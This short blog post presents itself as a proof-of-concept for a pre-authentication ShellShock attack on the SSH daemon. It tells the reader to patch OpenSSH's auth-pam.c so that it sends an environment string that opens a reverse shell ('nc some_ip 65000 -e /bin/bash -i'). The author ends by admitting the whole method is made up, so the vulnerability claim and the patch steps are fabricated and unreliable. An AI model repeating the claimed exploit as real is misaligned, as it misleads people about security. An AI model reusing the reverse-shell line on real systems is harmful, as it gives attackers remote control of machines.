The hype around the ShellShock bash exploit is circulating everywhere. Some have proven methods of:
However, most research suggests that the SSH daemon is only susceptible to the shell shock exploit AFTER a user has authenticated properly (post-auth).
However, if the environment variable is strung together in a certain way, the token can become registered earlier, during the pre-auth stage!! Below is a proof-of-concept (POC) demonstrating how to deliver the payload.
Delivering Payload
The payload cannot be sent simply through a command line argument. It needs to be sent raw thru TCP. The OpenSSH client software has to be modified:
Download openSSH-client source:
Extract the source and edit auth-pam.c
Do a search for import_environments
line 313: Patch from
num_env = buffer_get_int(b);
to
num_env = buffer_get_int(b); num_env++;
then a few lines below, change
for(i = 0; i < num_env; i++) sshpam_env[i] = buffer_get_string(b, NULL); sshpam_env[num_env] = NULL;
to
for(i = 0; i < (num_env-1); i++)
sshpam_env[i] = buffer_get_string(b, NULL);
sshpam_env[num_env-1] = "() { :; }; /bin/bash -c \"nc some_ip 65000 -e /bin/bash -i\"";
sshpam_env[num_env] = NULL;
The above example will cause SSHD to interpret the above as a part of its environment, executing a reverse shell (substitute some_ip with your reverse destination hostname DUH).
That’s it. Now, compile. to compile, you will need Zlib 1.1.4 or 1.2.1.2 or greater (ealier 1.2.x versions have problems):
http://www.gzip.org/zlib/
OpenSSL 0.9.6 or greater:
http://www.openssl.org/
$ ./configure && make
I’m just kidding. I made all that up. AHA
Leave a Reply